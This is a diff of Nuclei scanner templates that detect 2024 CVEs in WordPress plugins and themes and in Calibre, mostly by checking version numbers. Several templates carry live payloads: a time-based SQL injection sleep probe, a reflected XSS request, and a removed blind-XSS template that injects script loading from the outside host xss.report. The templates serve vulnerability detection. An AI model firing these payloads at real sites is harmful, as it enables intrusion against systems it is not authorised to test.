https://wpscan.com/vulnerability/68f81943-b007-49c8-be9c-d0405b2ba4cf/ + - https://vuldb.com/?id.272929 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2024-5975 + epss-score: 0.00043 + epss-percentile: 0.09404 + metadata: + vendor: team-contriverz + product: cz-loan-management + framework: wordpress + publicwww-query: "/wp-content/plugins/cz-loan-management" + tags: cve,cve2024,wpscan,wp-plugin,wordpress,wp,cz-loan-management + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"CZ Loan Management")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + @timeout 20s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=cz_plugin_for_user_get_percentage&selectedperiod=(select*from(select(sleep(6)))a) + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains(content_type,"text/html")' + - 'status_code == 200' + condition: and +# digest: 4a0a0047304502202cfedabc9957a35e0f37506cfa810e4dbf5d0c596ccde8d1662208e92c9c8343022100e076ba5a516edf8daec029f0117b83110e86aeaa398e3849f5d52fba17d1f0d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6254.yaml b/nuclei-templates/CVE-2024/CVE-2024-6254.yaml new file mode 100644 index 0000000000..3c26ec7fc5 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6254.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6254 + +info: + name: > + Brizy – Page Builder <= 2.5.1 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Brizy – Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.1. This is due to missing or incorrect nonce validation on form submissions. This makes it possible for unauthenticated attackers to submit forms intended for public use as another user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. On sites where unfiltered_html is enabled, this can lead to the admin unknowingly adding a Stored Cross-Site Scripting payload. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/75ec04f1-8bea-4514-b1d0-da5b305219d7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-6254 + metadata: + fofa-query: "wp-content/plugins/brizy/" + google-query: inurl:"/wp-content/plugins/brizy/" + shodan-query: 'vuln:CVE-2024-6254' + tags: cve,wordpress,wp-plugin,brizy,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/brizy/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "brizy" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6552.yaml b/nuclei-templates/CVE-2024/CVE-2024-6552.yaml new file mode 100644 index 0000000000..8e1d60209a --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6552.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6552 + +info: + name: > + Booking for Appointments and Events Calendar – Amelia <= 1.2 - Unauthenticated Full Path Disclosure + author: topscoder + severity: medium + description: > + The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.2. This is due to the plugin utilizing Symfony and leaving display_errors on within test files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c9aa2a44-5a71-4a10-9876-3d54b8d268c5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-6552 + metadata: + fofa-query: "wp-content/plugins/ameliabooking/" + google-query: inurl:"/wp-content/plugins/ameliabooking/" + shodan-query: 'vuln:CVE-2024-6552' + tags: cve,wordpress,wp-plugin,ameliabooking,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ameliabooking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ameliabooking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6824.yaml b/nuclei-templates/CVE-2024/CVE-2024-6824.yaml new file mode 100644 index 0000000000..12429e8bf1 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6824.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6824 + +info: + name: > + Premium Addons for Elementor <= 4.10.38 - Missing Authorization to Authenticated (Contributor+) Arbitrary Content Deletion and Arbitrary Title Update + author: topscoder + severity: low + description: > + The Premium Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'check_temp_validity' and 'update_template_title' functions in all versions up to, and including, 4.10.38. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary content and update post and page titles. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b2840b9e-1baf-460c-ba11-43e4279ece27?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-6824 + metadata: + fofa-query: "wp-content/plugins/premium-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/premium-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-6824' + tags: cve,wordpress,wp-plugin,premium-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "premium-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.10.38') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6869.yaml b/nuclei-templates/CVE-2024/CVE-2024-6869.yaml new file mode 100644 index 0000000000..035e88b5c3 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6869.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6869 + +info: + name: > + Falang multilanguage for WordPress <= 1.3.52 - Missing Authorization to Translation Update and Information Exposure + author: topscoder + severity: low + description: > + The Falang multilanguage for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.3.52. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update and delete translations and expose the administrator email address. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd4d67cd-5fb0-425d-8b22-c69ebb0ffa72?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-6869 + metadata: + fofa-query: "wp-content/plugins/falang/" + google-query: inurl:"/wp-content/plugins/falang/" + shodan-query: 'vuln:CVE-2024-6869' + tags: cve,wordpress,wp-plugin,falang,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/falang/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "falang" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.52') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6987.yaml b/nuclei-templates/CVE-2024/CVE-2024-6987.yaml new file mode 100644 index 0000000000..ab95db0ed5 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6987.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6987 + +info: + name: > + Orchid Store <= 1.5.6 - Missing Authorization to Authenticated (Subscriber+) Limited Plugin Activation + author: topscoder + severity: low + description: > + The Orchid Store theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'orchid_store_activate_plugin' function in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate the Addonify Floating Cart For WooCommerce plugin if it is installed. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5402f206-0375-4c47-8a5c-e8ea5742493d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-6987 + metadata: + fofa-query: "wp-content/themes/orchid-store/" + google-query: inurl:"/wp-content/themes/orchid-store/" + shodan-query: 'vuln:CVE-2024-6987' + tags: cve,wordpress,wp-theme,orchid-store,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/orchid-store/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "orchid-store" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.6') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7008.yaml b/nuclei-templates/CVE-2024/CVE-2024-7008.yaml new file mode 100644 index 0000000000..9d2e941294 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7008.yaml @@ -0,0 +1,39 @@ +id: CVE-2024-7008 + +info: + name: Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS) + author: DhiyaneshDK + severity: medium + description: | + It is possible to inject arbitrary JavaScript code into the /browse endpoint of the Calibre content server, allowing an attacker to craft a URL that when clicked by a victim, will execute the attacker’s JavaScript code in the context of the victim’s browser. If the Calibre server is running with authentication enabled and the victim is logged in at the time, this can be used to cause the victim to perform actions on the Calibre server on behalf of the attacker. + reference: + - https://starlabs.sg/advisories/24/24-7008/ + metadata: + verified: true + shodan-query: html:"Calibre" + fofa-query: "Server: calibre" + max-requeset: 1 + tags: cve,cve2024,calibre,xss + +http: + - raw: + - | + GET /browse/book/TEST";window.stop();alert(document.domain);%2f%2f HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - 'window.location.href = "/#book_id=TEST";window.stop();alert(document.domain);//&panel=book_details' + + - type: status + status: + - 200 +# digest: 490a004630440220204753a269829273bf653d6bc90e49f892dbce2ee36a361edb1e33a0537442da02203a4a9991048fd3702d95471a875fb381c0fa628e090a0f4156c8f876dae1be48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7150.yaml b/nuclei-templates/CVE-2024/CVE-2024-7150.yaml new file mode 100644 index 0000000000..24a797b9c2 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7150.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7150 + +info: + name: > + Slider by 10Web – Responsive Image Slider <= 1.2.57 - Authenticated (Contributor+) SQL Injection via id Parameter + author: topscoder + severity: low + description: > + The Slider by 10Web – Responsive Image Slider plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' parameter in all versions up to, and including, 1.2.57 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/74d635b6-2b4a-49af-af5c-6bfa1b5d220e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7150 + metadata: + fofa-query: "wp-content/plugins/slider-wd/" + google-query: inurl:"/wp-content/plugins/slider-wd/" + shodan-query: 'vuln:CVE-2024-7150' + tags: cve,wordpress,wp-plugin,slider-wd,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/slider-wd/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "slider-wd" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.57') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7350.yaml b/nuclei-templates/CVE-2024/CVE-2024-7350.yaml new file mode 100644 index 0000000000..7b36f4540d --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7350.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7350 + +info: + name: > + Appointment Booking Calendar Plugin and Online Scheduling Plugin – BookingPress 1.1.6 - 1.1.7 - Authentication Bypass to Account Takeover + author: topscoder + severity: critical + description: > + The Appointment Booking Calendar Plugin and Online Scheduling Plugin – BookingPress plugin for WordPress is vulnerable to authentication bypass in versions 1.1.6 to 1.1.7. This is due to the plugin not properly verifying a user's identity prior to logging them in when completing a booking. This makes it possible for unauthenticated attackers to log in as registered users, including administrators, if they have access to that user's email. This is only exploitable when the 'Auto login user after successful booking' setting is enabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4c367565-75f7-4dd7-a2f1-111df581bd7a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-7350 + metadata: + fofa-query: "wp-content/plugins/bookingpress-appointment-booking/" + google-query: inurl:"/wp-content/plugins/bookingpress-appointment-booking/" + shodan-query: 'vuln:CVE-2024-7350' + tags: cve,wordpress,wp-plugin,bookingpress-appointment-booking,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bookingpress-appointment-booking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bookingpress-appointment-booking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 1.1.6', '<= 1.1.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7486.yaml b/nuclei-templates/CVE-2024/CVE-2024-7486.yaml new file mode 100644 index 0000000000..3462a19692 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7486.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7486 + +info: + name: > + MultiPurpose <= 1.2.0 - Authenticated (Contributor+) PHP Object Injection + author: topscoder + severity: low + description: > + The MultiPurpose theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.0 via deserialization of untrusted input through the 'wpeden_post_meta' post meta. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e029bc15-8128-42d1-8874-b0689312cb35?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7486 + metadata: + fofa-query: "wp-content/themes/multipurpose/" + google-query: inurl:"/wp-content/themes/multipurpose/" + shodan-query: 'vuln:CVE-2024-7486' + tags: cve,wordpress,wp-theme,multipurpose,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/multipurpose/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "multipurpose" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7492.yaml b/nuclei-templates/CVE-2024/CVE-2024-7492.yaml new file mode 100644 index 0000000000..e4de1c2c6a --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7492.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7492 + +info: + name: > + MainWP Child Reports <= 2.2 - Cross-Site Request Forgery to Arbitrary Options Update + author: topscoder + severity: medium + description: > + The MainWP Child Reports plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2. This is due to missing or incorrect nonce validation on the network_options_action() function. This makes it possible for unauthenticated attackers to update arbitrary options that can be leveraged for privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This is only exploitable on multisite instances. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cdd7971c-6f1c-437a-832c-e2b2817a197e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7492 + metadata: + fofa-query: "wp-content/plugins/mainwp-child-reports/" + google-query: inurl:"/wp-content/plugins/mainwp-child-reports/" + shodan-query: 'vuln:CVE-2024-7492' + tags: cve,wordpress,wp-plugin,mainwp-child-reports,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mainwp-child-reports/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mainwp-child-reports" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7548.yaml b/nuclei-templates/CVE-2024/CVE-2024-7548.yaml new file mode 100644 index 0000000000..699d0334a5 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7548.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7548 + +info: + name: > + LearnPress – WordPress LMS Plugin <= 4.2.6.9.3 - Authenticated (Contributor+) SQL Injection via order Parameter + author: topscoder + severity: low + description: > + The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the 'order' parameter in all versions up to, and including, 4.2.6.9.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/702715a9-b180-4d31-a1df-37b732ae8226?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7548 + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:CVE-2024-7548' + tags: cve,wordpress,wp-plugin,learnpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.6.9.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7560.yaml b/nuclei-templates/CVE-2024/CVE-2024-7560.yaml new file mode 100644 index 0000000000..9503d325c0 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7560.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7560 + +info: + name: > + News Flash <= 1.1.0 - Authenticated (Editor+) PHP Object Injection + author: topscoder + severity: low + description: > + The News Flash theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1.0 via deserialization of untrusted input from the newsflash_post_meta meta value. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d5631826-6975-41e9-a896-f2aa0581334f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-7560 + metadata: + fofa-query: "wp-content/themes/news-flash/" + google-query: inurl:"/wp-content/themes/news-flash/" + shodan-query: 'vuln:CVE-2024-7560' + tags: cve,wordpress,wp-theme,news-flash,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/news-flash/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "news-flash" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7561.yaml b/nuclei-templates/CVE-2024/CVE-2024-7561.yaml new file mode 100644 index 0000000000..c464e22421 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7561.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7561 + +info: + name: > + The Next <= 1.1.0 - Authenticated (Contributor+) PHP Object Injection + author: topscoder + severity: low + description: > + The The Next theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1.0 via deserialization of untrusted input from the wpeden_post_meta post meta value. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a76dcb33-4c6b-44dc-9b27-6daf4f0a1376?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7561 + metadata: + fofa-query: "wp-content/themes/the-next/" + google-query: inurl:"/wp-content/themes/the-next/" + shodan-query: 'vuln:CVE-2024-7561' + tags: cve,wordpress,wp-theme,the-next,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/the-next/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "the-next" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.0') \ No newline at end of file diff --git a/nuclei-templates/Other/0x71rex-blind-xss.yaml b/nuclei-templates/Other/0x71rex-blind-xss.yaml deleted file mode 100644 index 3f6bcba7bb..0000000000 --- a/nuclei-templates/Other/0x71rex-blind-xss.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: blind-xss - -info: - name: Blind XSS - author: shelled - severity: medium - description: This template will spray blind XSS payloads into URLs. Use xss.report to check if the payload fired. - tags: xss,blind,generic - -requests: - - raw: - - | - GET {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: {{injection}} - - - payloads: - injection: - - '">' - - '">' - - 'javascript:eval("var a=document.createElement(\"script\");a.src=\"//xss.report/s/shelled\";document.body.appendChild(a)")' - - '">' - - '">